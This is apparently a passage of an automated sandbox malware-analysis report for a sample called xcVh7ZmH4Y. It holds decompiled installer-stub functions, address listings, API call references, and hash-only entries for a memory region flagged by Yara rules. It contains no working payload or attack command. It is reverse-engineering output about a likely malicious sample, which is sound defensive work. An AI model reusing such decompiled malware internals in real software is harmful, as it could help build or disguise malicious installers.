								if(0 == 0x42b238) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E58(0x42b238);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x42b238) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E27(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
									E00404E0F(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x42b228);
									} else {
										E00404D46(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x434fa4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004044BB(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42d258 == _t158) {
									E004048E3();
								}
								 *0x42d258 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x42d268;
							_v60 = E00404CE0;
							_v56 = _t146;
							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405E0C(_t146);
								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp") {
									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
										lstrcatW(_t146, 0x432ea0);
									}
								}
								 *0x42d258 =  *0x42d258 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
						E00405E0C(_t146);
					}
					 *0x433ed8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404499(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404499(_t167);
					E004044CE(_t166);
					_t138 = E0040690A(8);
					if(_t138 == 0) {
						L53:
						return E00404500(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                                                      0x0040498a
                                                                                      0x00404990
                                                                                      0x00404996
                                                                                      0x0040499a
                                                                                      0x0040499d
                                                                                      0x004049a3
                                                                                      0x004049b1
                                                                                      0x004049b4
                                                                                      0x004049bc
                                                                                      0x004049c2
                                                                                      0x004049c2
                                                                                      0x004049ce
                                                                                      0x004049d1
                                                                                      0x00404a3f
                                                                                      0x00404a46
                                                                                      0x00404b1d
                                                                                      0x00404b24
                                                                                      0x00404b33
                                                                                      0x00404b33
                                                                                      0x00404b37
                                                                                      0x00404b41
                                                                                      0x00404b4e
                                                                                      0x00404b50
                                                                                      0x00404b50
                                                                                      0x00404b5e
                                                                                      0x00404b65
                                                                                      0x00404b6c
                                                                                      0x00404b6f
                                                                                      0x00404bab
                                                                                      0x00404bad
                                                                                      0x00404bb3
                                                                                      0x00404bb8
                                                                                      0x00404bbc
                                                                                      0x00404bbe
                                                                                      0x00404bbe
                                                                                      0x00404bda
                                                                                      0x00000000
                                                                                      0x00404bdc
                                                                                      0x00404bdf
                                                                                      0x00404bed
                                                                                      0x00404bf3
                                                                                      0x00404bf4
                                                                                      0x00404bf7
                                                                                      0x00404bfa
                                                                                      0x00000000
                                                                                      0x00404bfa
                                                                                      0x00404b71
                                                                                      0x00404b73
                                                                                      0x00404b77
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404b79
                                                                                      0x00404b79
                                                                                      0x00404b86
                                                                                      0x00404b8b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404b8f
                                                                                      0x00404b91
                                                                                      0x00404b91
                                                                                      0x00404b9a
                                                                                      0x00404b9c
                                                                                      0x00404ba1
                                                                                      0x00404ba4
                                                                                      0x00404ba9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404ba9
                                                                                      0x00404c06
                                                                                      0x00404c10
                                                                                      0x00404c13
                                                                                      0x00404c16
                                                                                      0x00404c1d
                                                                                      0x00404c1d
                                                                                      0x00404c1f
                                                                                      0x00404c1f
                                                                                      0x00404c24
                                                                                      0x00404c26
                                                                                      0x00404c2e
                                                                                      0x00404c35
                                                                                      0x00404c37
                                                                                      0x00404c42
                                                                                      0x00404c42
                                                                                      0x00404c37
                                                                                      0x00404c52
                                                                                      0x00404c5c
                                                                                      0x00404c64
                                                                                      0x00404c7f
                                                                                      0x00404c66
                                                                                      0x00404c6f
                                                                                      0x00404c6f
                                                                                      0x00404c64
                                                                                      0x00404c84
                                                                                      0x00404c89
                                                                                      0x00404c8e
                                                                                      0x00404c97
                                                                                      0x00404c97
                                                                                      0x00404ca0
                                                                                      0x00404ca2
                                                                                      0x00404ca2
                                                                                      0x00404cae
                                                                                      0x00404cb6
                                                                                      0x00404cc0
                                                                                      0x00404cc0
                                                                                      0x00404cc5
                                                                                      0x00000000
                                                                                      0x00404cc5
                                                                                      0x00404b6f
                                                                                      0x00404b26
                                                                                      0x00404b2d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404b2d
                                                                                      0x00404a4c
                                                                                      0x00404a55
                                                                                      0x00404a6f
                                                                                      0x00404a74
                                                                                      0x00404a7e
                                                                                      0x00404a85
                                                                                      0x00404a91
                                                                                      0x00404a94
                                                                                      0x00404a97
                                                                                      0x00404a9e
                                                                                      0x00404aa6
                                                                                      0x00404aa9
                                                                                      0x00404aad
                                                                                      0x00404ab4
                                                                                      0x00404abc
                                                                                      0x00404b16
                                                                                      0x00404abe
                                                                                      0x00404abf
                                                                                      0x00404ac6
                                                                                      0x00404ad0
                                                                                      0x00404ad8
                                                                                      0x00404ae5
                                                                                      0x00404af9
                                                                                      0x00404afd
                                                                                      0x00404afd
                                                                                      0x00404af9
                                                                                      0x00404b02
                                                                                      0x00404b0f
                                                                                      0x00404b0f
                                                                                      0x00404abc
                                                                                      0x00000000
                                                                                      0x00404a74
                                                                                      0x00404a62
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404a68
                                                                                      0x00000000
                                                                                      0x004049d3
                                                                                      0x004049e0
                                                                                      0x004049e9
                                                                                      0x004049f6
                                                                                      0x004049f6
                                                                                      0x004049fd
                                                                                      0x00404a03
                                                                                      0x00404a0c
                                                                                      0x00404a0f
                                                                                      0x00404a12
                                                                                      0x00404a1a
                                                                                      0x00404a1d
                                                                                      0x00404a20
                                                                                      0x00404a26
                                                                                      0x00404a2d
                                                                                      0x00404a34
                                                                                      0x00404ccb
                                                                                      0x00404cdd
                                                                                      0x00404a3a
                                                                                      0x00404a3d
                                                                                      0x00000000
                                                                                      0x00404a3d
                                                                                      0x00404a34

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                                      • SetWindowTextW.USER32(00000000,-00436000), ref: 00404A03
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                                      • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,-00436000), ref: 00404AF1
                                                                                      • lstrcatW.KERNEL32(-00436000,Call), ref: 00404AFD
                                                                                      • SetDlgItemTextW.USER32(?,000003FB,-00436000), ref: 00404B0F
                                                                                        • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                                                        • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75A43420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                        • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                        • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,75A43420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                        • Part of subcall function 004067C4: CharPrevW.USER32(?,?,75A43420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                      • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,-00436000,00000001,0042B238,-00436000,-00436000,000003FB,-00436000), ref: 00404BD2
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                                                        • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404DE7
                                                                                        • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                                        • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: A$C:\Users\user\AppData\Local\Temp$Call$ppingA
                                                                                      • API String ID: 2624150263-3801998483
                                                                                      • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                      • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                                      • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                      • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 67%
                                                                                      			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x441000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                                                      0x004021b3
                                                                                      0x004021bd
                                                                                      0x004021c7
                                                                                      0x004021d1
                                                                                      0x004021dc
                                                                                      0x004021df
                                                                                      0x004021f9
                                                                                      0x004021fc
                                                                                      0x00402202
                                                                                      0x00402205
                                                                                      0x0040220f
                                                                                      0x00402213
                                                                                      0x00402213
                                                                                      0x00402218
                                                                                      0x00402229
                                                                                      0x00402231
                                                                                      0x004022e8
                                                                                      0x004022e8
                                                                                      0x004022ef
                                                                                      0x00402237
                                                                                      0x00402237
                                                                                      0x00402246
                                                                                      0x0040224a
                                                                                      0x0040224d
                                                                                      0x00402253
                                                                                      0x00402261
                                                                                      0x00402264
                                                                                      0x00402266
                                                                                      0x00402271
                                                                                      0x00402271
                                                                                      0x00402276
                                                                                      0x00402278
                                                                                      0x0040227f
                                                                                      0x0040227f
                                                                                      0x00402282
                                                                                      0x0040228b
                                                                                      0x0040228e
                                                                                      0x00402294
                                                                                      0x00402296
                                                                                      0x004022a0
                                                                                      0x004022a0
                                                                                      0x004022a3
                                                                                      0x004022ac
                                                                                      0x004022af
                                                                                      0x004022b8
                                                                                      0x004022be
                                                                                      0x004022c0
                                                                                      0x004022ce
                                                                                      0x004022ce
                                                                                      0x004022d1
                                                                                      0x004022d7
                                                                                      0x004022d7
                                                                                      0x004022da
                                                                                      0x004022e0
                                                                                      0x004022e6
                                                                                      0x004022fb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004022e6
                                                                                      0x004022f1
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID:
                                                                                      • API String ID: 542301482-0
                                                                                      • Opcode ID: 3c4303e572c21d3ee0d25cdd6e38a92fccf890e788a1af2a38fbfdcd1b0c250e
                                                                                      • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                                                      • Opcode Fuzzy Hash: 3c4303e572c21d3ee0d25cdd6e38a92fccf890e788a1af2a38fbfdcd1b0c250e
                                                                                      • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4D811 Relevance: 1.5, Strings: 1, Instructions: 297COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /O(}
                                                                                      • API String ID: 0-3510241698
                                                                                      • Opcode ID: 29d28a66994e65b41c47eb62928cd883787cb7efa676d320450b0f8a96831bd0
                                                                                      • Instruction ID: 1fadaa25fa5695ea0e7ee358ecb6f33b43ae567800327d11aee02c99d523a87f
                                                                                      • Opcode Fuzzy Hash: 29d28a66994e65b41c47eb62928cd883787cb7efa676d320450b0f8a96831bd0
                                                                                      • Instruction Fuzzy Hash: FCB16A72648345CFDB348F28C8A47EA3BB1EF953A0F59412ECD8ACB655D7718982CB01
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4D8CD Relevance: 1.5, Strings: 1, Instructions: 278COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /O(}
                                                                                      • API String ID: 0-3510241698
                                                                                      • Opcode ID: e8dfb38e503613909ed5767a8033397a100b6d7a6b9413dd980c7d88d64dacbc
                                                                                      • Instruction ID: 769400aa969a6151478306e5fa1eefebc2cea01abcb96f93c64919a4d8a1666a
                                                                                      • Opcode Fuzzy Hash: e8dfb38e503613909ed5767a8033397a100b6d7a6b9413dd980c7d88d64dacbc
                                                                                      • Instruction Fuzzy Hash: 58A14572648346CFDB348E6888A43EA77B2FF953A4F65413ECC8ACB645D7714982CB41
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F494A7 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: [o
                                                                                      • API String ID: 0-1618177226
                                                                                      • Opcode ID: 2b8c66f9eb6bb7dd49d4613b5b3934de903f4000814552f09dc4acf566e0bb00
                                                                                      • Instruction ID: cf610df22a5532a60374763c7db3d4d05b4f39ce187aacc0a5b1bba579f79a56
                                                                                      • Opcode Fuzzy Hash: 2b8c66f9eb6bb7dd49d4613b5b3934de903f4000814552f09dc4acf566e0bb00
                                                                                      • Instruction Fuzzy Hash: A39159327047898FDB308E68DDA43DB77A2EF953E0F64822ECD4A9B284DBB14541CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4997A Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: [o
                                                                                      • API String ID: 0-1618177226
                                                                                      • Opcode ID: 7e04ab83ed9a8eeb92cefad485537a311df17ca7862851dd711e72933eba8c44
                                                                                      • Instruction ID: 625c0dbdc708b25476dc43e3c9b10d7525fb3b72302eb8a3e4258d21886523d8
                                                                                      • Opcode Fuzzy Hash: 7e04ab83ed9a8eeb92cefad485537a311df17ca7862851dd711e72933eba8c44
                                                                                      • Instruction Fuzzy Hash: EF9159323043898FDB308E28DDA43DB37A2EF953E0F64822ECD4A9B284D7B14541CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F49831 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: [o
                                                                                      • API String ID: 0-1618177226
                                                                                      • Opcode ID: c95da6db5a7581161ae62cd6d013ce0b19fcdd165ccb436a0c6f7712f684a9d9
                                                                                      • Instruction ID: 866d7d18192d399e2a322958332562ee44370c87f03b79150b57d35098ad911f
                                                                                      • Opcode Fuzzy Hash: c95da6db5a7581161ae62cd6d013ce0b19fcdd165ccb436a0c6f7712f684a9d9
                                                                                      • Instruction Fuzzy Hash: 438159727047898FDF308E29D9A43DB37A2EF953E0F64822ECD4A9B284D7B14941CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4954D Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: [o
                                                                                      • API String ID: 0-1618177226
                                                                                      • Opcode ID: 7901fdcd23686a3665820f98a5b65beacf9724e2d6bf9254302cc56af841d789
                                                                                      • Instruction ID: e9f6f7cbda98773f7cf525a9d4f949e66a509ee983e7f2436c1eb88c859d6276
                                                                                      • Opcode Fuzzy Hash: 7901fdcd23686a3665820f98a5b65beacf9724e2d6bf9254302cc56af841d789
                                                                                      • Instruction Fuzzy Hash: 608158327047898FDB308E28D9A43DB37A2EF953E0F64822ECD4A9F285D7B14941CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4D8BB Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /O(}
                                                                                      • API String ID: 0-3510241698
                                                                                      • Opcode ID: 44b5ac8967299e387ef5f523404d3e5d0af7dd15e4832df3120f4658bd90e8b7
                                                                                      • Instruction ID: 853aa5f87b79d094b1aaa2b6a4c48ef9fc481dd888b76e8b5ea8a4fd37214ccd
                                                                                      • Opcode Fuzzy Hash: 44b5ac8967299e387ef5f523404d3e5d0af7dd15e4832df3120f4658bd90e8b7
                                                                                      • Instruction Fuzzy Hash: 08A13772A4835ACFCB349F28C8943DA7BB1EF95394F19413ECC8A8B615D7714986CB01
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4D9CD Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /O(}
                                                                                      • API String ID: 0-3510241698
                                                                                      • Opcode ID: e647dde961eaa9cc15b0b13d08c6a8d2f7416fda6327e053348c2ba1d8dacc5a
                                                                                      • Instruction ID: fd41f77262c2a879ed7f2fe74a2821274846b3aff72ded4d287474c4204f42fa
                                                                                      • Opcode Fuzzy Hash: e647dde961eaa9cc15b0b13d08c6a8d2f7416fda6327e053348c2ba1d8dacc5a
                                                                                      • Instruction Fuzzy Hash: 50912472648346CFDB348F6888643EA77B2FF953A4F65423ECC4A8B641D7724582CB01
